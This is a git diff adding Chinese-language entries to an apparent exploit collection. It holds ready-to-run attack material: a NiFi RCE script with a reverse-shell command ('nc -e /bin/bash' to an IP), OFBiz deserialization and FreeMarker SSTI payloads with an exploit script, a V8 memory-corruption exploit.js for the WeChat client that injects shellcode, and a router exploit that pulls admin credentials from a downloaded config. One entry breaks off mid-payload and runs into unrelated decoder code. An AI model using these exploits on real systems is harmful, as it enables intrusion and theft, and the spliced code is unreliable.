process_group_id): + url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors" + data = { + 'component': { + 'type': 'org.apache.nifi.processors.standard.ExecuteProcess' + }, + 'revision': { + 'version': 0 + } + } + headers = { + "Content-Type": "application/json", + } + try: + res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False) + return res.json()["id"] + except Exception as e: + pass + return 0 + + +if __name__ == '__main__': + if len(sys.argv) != 3: + print("rce.py url cmd") + else: + url = sys.argv[1] # http://192.168.1.1:8080 + cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234 + e = Exp(url) + e.exploit(cmd) + +``` + +msf模块: + +https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt \ No newline at end of file diff --git a/Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md b/Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md new file mode 100644 index 0000000..c1591dc --- /dev/null +++ b/Web服务器漏洞/Apache OFBiz RMI Bypass RCE CVE-2021-29200.md 
@@ -0,0 +1,51 @@ +# Apache OFBiz RMI Bypass RCE CVE-2021-29200 + +## 漏洞描述 + +由于Apache OFBiz存在Java RMI反序列化漏洞,未经身份验证的用户可以执行RCE攻击,导致服务器被接管。 + +参考链接: + +- https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw +- https://xz.aliyun.com/t/9556 + +## 漏洞影响 + +``` +Apache OFBiz < 17.12.07 +``` + +## 漏洞复现 + +poc: + +``` +POST /webtools/control/SOAPService HTTP/1.1 +Host: xxx +User-Agent: python-requests/2.24.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: text/xml +Content-Length: 877 + + + + + + + + + + ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078 + + + + + + + + + +``` + diff --git a/其他漏洞/微信客户端 远程命令执行漏洞.md b/其他漏洞/微信客户端 远程命令执行漏洞.md new file mode 100644 index 0000000..fc693f9 --- /dev/null +++ b/其他漏洞/微信客户端 远程命令执行漏洞.md 
@@ -0,0 +1,196 @@ +# 微信客户端 远程命令执行漏洞 + +## 漏洞描述 + +微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 + +参考链接: + +- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ + +## 漏洞影响 + +``` +微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41 +``` + +## 漏洞复现 + +[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链: + +1. 攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。 +2. 当员工打开攻击者的钓鱼链接时触发该漏洞,从而导致目标员工PC被植入攻击者制作的cobalstrike木马,木马进程为:xxxsoft.exe,同时创建了名为dotnet_v4.3的系统服务。 +3. 随后,攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。 + +exploit.js: + +``` +ENABLE_LOG = true; +IN_WORKER = true; + +// run calc and hang in a loop +var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的 + +function print(data) { +} + + +var not_optimised_out = 0; +var target_function = (function (value) { + if (value == 0xdecaf0) { + not_optimised_out += 1; + } + not_optimised_out += 1; + not_optimised_out |= 0xff; + not_optimised_out *= 12; +}); + +for (var i = 0; i < 0x10000; ++i) { + target_function(i); +} + + +var g_array; +var tDerivedNCount = 17 * 87481 - 8; +var tDerivedNDepth = 19 * 19; + +function cb(flag) { + if (flag == true) { + return; + } + g_array = new Array(0); + g_array[0] = 0x1dbabe * 2; + return 'c01db33f'; +} + +function gc() { + for (var i = 0; i < 0x10000; ++i) { + new String(); + } +} + +function oobAccess() { + var this_ = this; + this.buffer = null; + this.buffer_view = null; + + this.page_buffer = null; + this.page_view = null; + + this.prevent_opt = []; + + var kSlotOffset = 0x1f; + var kBackingStoreOffset = 0xf; + + class LeakArrayBuffer extends ArrayBuffer { + constructor() { + super(0x1000); + this.slot = this; + } + } + + this.page_buffer = new LeakArrayBuffer(); + this.page_view = new DataView(this.page_buffer); + + new RegExp({ toString: function () { return 'a' } }); + cb(true); + + class DerivedBase extends RegExp { + constructor() { + // var array = null; + super( + // at this point, 
the 4-byte allocation for the JSRegExp `this` object + // has just happened. + { + toString: cb + }, 'g' + // now the runtime JSRegExp constructor is called, corrupting the + // JSArray. + ); + + // this allocation will now directly follow the FixedArray allocation + // made for `this.data`, which is where `array.elements` points to. + this_.buffer = new ArrayBuffer(0x80); + g_array[8] = this_.page_buffer; + } + } + + // try{ + var derived_n = eval(`(function derived_n(i) { + if (i == 0) { + return DerivedBase; + } + + class DerivedN extends derived_n(i-1) { + constructor() { + super(); + return; + ${"this.a=0;".repeat(tDerivedNCount)} + } + } + + return DerivedN; + })`); + + gc(); + + + new (derived_n(tDerivedNDepth))(); + + this.buffer_view = new DataView(this.buffer); + this.leakPtr = function (obj) { + this.page_buffer.slot = obj; + return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); + } + + this.setPtr = function (addr) { + this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); + } + + this.read32 = function (addr) { + this.setPtr(addr); + return this.page_view.getUint32(0, true, ...this.prevent_opt); + } + + this.write32 = function (addr, value) { + this.setPtr(addr); + this.page_view.setUint32(0, value, true, ...this.prevent_opt); + } + + this.write8 = function (addr, value) { + this.setPtr(addr); + this.page_view.setUint8(0, value, ...this.prevent_opt); + } + + this.setBytes = function (addr, content) { + for (var i = 0; i < content.length; i++) { + this.write8(addr + i, content[i]); + } + } + return this; +} + +function trigger() { + var oob = oobAccess(); + + var func_ptr = oob.leakPtr(target_function); + print('[*] target_function at 0x' + func_ptr.toString(16)); + + var kCodeInsOffset = 0x1b; + + var code_addr = oob.read32(func_ptr + kCodeInsOffset); + print('[*] code_addr at 0x' + code_addr.toString(16)); + + oob.setBytes(code_addr, shellcode); + + target_function(0); +} + +try{ + print("start 
running"); + trigger(); +}catch(e){ + print(e); +} +``` + diff --git a/开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md b/开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md new file mode 100644 index 0000000..f7ffbec --- /dev/null +++ b/开发框架漏洞/Apache OFBiz 反序列化 CVE-2021-30128.md 
@@ -0,0 +1,158 @@ +# Apache OFBiz 反序列化 CVE-2021-30128 + +## 漏洞描述 + +Ofbiz(Open for business)是一个开源的,基于J2EE和XML规范的,用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架(Framework)。 + +参考链接: + +- 阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w +- r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A +- https://github.com/r0ckysec/CVE-2021-30128 +- https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A + +## 漏洞影响 + +``` +Apache OFBiz < 17.12.07 +``` + +## FOFA + +``` +app="Apache_OFBiz" +``` + +## 漏洞复现 + +poc: + +``` +POST /webtools/control/SOAPService HTTP/1.1 +Host: 192.168.80.145:8443 +User-Agent: python-requests/2.24.0 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: text/xml +Content-Length: 6093 + + + + + + + + + ACED0005 ... ... 871007E000D78 + + + + + + + + + +``` + +exp: + + +```py +#!/usr/bin/env python +# -*- coding: utf-8 -*- +""" +@Author: r0cky +@Time: 2021/3/24-15:09 +""" +import subprocess +import sys + +import requests +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def banner(): + print(""" +=================================================== + ____ ______ ____ _ ________ _______ + / __ \| ____| _ \(_) | ____\ \ / / __ \ + | | | | |__ | |_) |_ ____ | |__ \ V /| |__) | + | | | | __| | _ <| |_ / | __| > < | ___/ + | |__| | | | |_) | |/ / | |____ / . 
\| | + \____/|_| |____/|_/___| |______/_/ \_\_| + + CVE-2021-30128 Powered by r0cky +=================================================== + """) + +def bypass(payload): + className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'] + + for cn in className: + len_hex = hex(len(cn)).replace('0x','').upper() + className_hex = cn.encode().hex().upper() + + bypass_className = cn + ' + + + + + + + {} + + + + + + + + + + """.format(post_data) + print("[+] payload sending...") + r = requests.post(url, data=data, headers=headers, verify=False) + if r.status_code == 200: + print("[+] send payload success.") + print() + print("[END] Apache OFBiz RCE Done.") + else: + print("[-] send payload failed.") + print() + print("[END] Apache OFBiz RCE failed.") + +headers={"Content-Type": "text/xml"} + +if __name__ == '__main__': + banner() + try: + target = sys.argv[1] + cmd = sys.argv[2] + # target = "https://192.168.80.136:8443" + # vps_ip = "10.20.28.16" + # vps_port = "9999" + url = "{}/webtools/control/SOAPService".format(target) + exp(url, cmd) + except: + print("Example: \n\tpython3 " + sys.argv[0] + " \n") + +``` diff --git a/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md b/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md new file mode 100644 index 0000000..7325180 --- /dev/null +++ b/开发框架漏洞/Apache OfBiz 服务器端模板注入 SSTI.md 
@@ -0,0 +1,34 @@
+# Apache OfBiz 服务器端模板注入 SSTI
+
+## 漏洞描述
+
+Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。
+
+参考链接:
+
+- https://securitylab.github.com/advisories/GHSL-2020-067-apache_ofbiz
+
+## 漏洞影响
+
+```
+Apache OfBiz 17.12.01
+```
+
+## FOFA
+
+```
+app="Apache_OFBiz"
+```
+
+## 漏洞复现
+
+服务器端模板注入 renderLookupField
+
+从不可信数据流request.getParameter("`_LAST_VIEW_NAME_`")给一个FreeMarker的宏调用定义。具有特权以渲染任何包含查找字段的页面的攻击者将能够通过发送有效载荷来执行任意系统命令。
+
+poc:
+
+```
+https://localhost:8443/ordermgr/control/FindQuote?_LAST_VIEW_NAME_=%22%2F%3E%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D%3CFOO
+```
+
diff --git a/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md b/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
new file mode 100644
index 0000000..66866dc
--- /dev/null
+++ b/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
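Review bot: The 漏洞描述 paragraph of this entry ("Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响…") reappears word for word in the next entry, Apache OfBiz 远程代码执行 RCE.md, even though that entry cites a different advisory (GHSL-2020-066 versus GHSL-2020-067 here), so one of the two descriptions looks like a copy-paste; confirm which advisory each paragraph actually describes. 漏洞影响 lists only `Apache OfBiz 17.12.01` and no fixed version, leaving the reader to infer remediation from the linked advisory; I would add a `## 修复建议` section that names the patched release taken from that advisory. The precondition buried in the second 漏洞复现 paragraph (the attacker must already be privileged enough to render a page containing a lookup field) materially changes severity and deserves its own line, e.g. `前提: 需要具备渲染包含查找字段页面的权限`. For detection, the poc shows the payload travelling in the `_LAST_VIEW_NAME_` query parameter, so a note that requests whose `_LAST_VIEW_NAME_` value contains `freemarker.template.utility.Execute` are a reliable indicator would make the entry useful to defenders as well.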
@@ -0,0 +1,24 @@ +# Apache OfBiz 远程代码执行 RCE + +## 漏洞描述 + +Apache OfBiz 17.12.01容易受到服务器端模板注入(SSTI)的影响,从而导致远程代码执行(RCE)。 + +参考链接: + +- https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz + +## FOFA + +``` +app="Apache_OFBiz" +``` + +## 漏洞复现 + +poc: + +``` +https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}> bitindex)) + + for nextbit in buts_arr: + offset = (offset + 1) % 8 + if ignore > 0: + ignore = ignore - 1 + continue + bits.append(nextbit) + if len(bits) == pointwidth: + cp_int = 0 + lsb_first = [b for b in bits] + lsb_first.reverse() + for bit_index in range(len(lsb_first)): + if lsb_first[bit_index]: + cp_int = cp_int | (1 << bit_index) + + bits = [] + codepoints_arr.append(cp_int) + codesize = codesize + 1 + if cp_int in [CLEAR_CODE, END_OF_CODE]: + codesize = init_csize + pointwidth = minwidth + else: + while codesize >= (2 ** pointwidth): + pointwidth = pointwidth + 1 + if cp_int == END_OF_CODE: + ignore = (8 - offset) % 8 + + + decodedBytes = [] + for cp_int in codepoints_arr: + + suffix = "" + if cp_int == CLEAR_CODE: + _cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256)) + _cp_dict[CLEAR_CODE] = CLEAR_CODE + _cp_dict[END_OF_CODE] = END_OF_CODE + prefix = None + + elif cp_int != END_OF_CODE: + if cp_int in _cp_dict: + suffix = _cp_dict[cp_int] + if None != prefix: + _cp_dict[len(_cp_dict)] = prefix + suffix[0] + else: + suffix = prefix + prefix[0] + _cp_dict[len(_cp_dict)] = suffix + prefix = suffix + decoded = suffix + for char in decoded: + decodedBytes.append(char) + return decodedBytes + + + + + + +def exploit(ip): + print "[!] 
Downloading config" + try: + r = requests.get("http://{}/goform/getimage".format(ip)) + pass + except: + print "[-] Failed to download the config, the target may not be vulnerable" + + BIN_CONTENT = r.content + BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50] + + CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT)) + + USER_, PASS_ = "", "" + for i in ADMIN_LOG_CFG.keys(): + if i in CONFIG_XML: + CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:] + PASS_ = CONFIG_XML[:CONFIG_XML.index('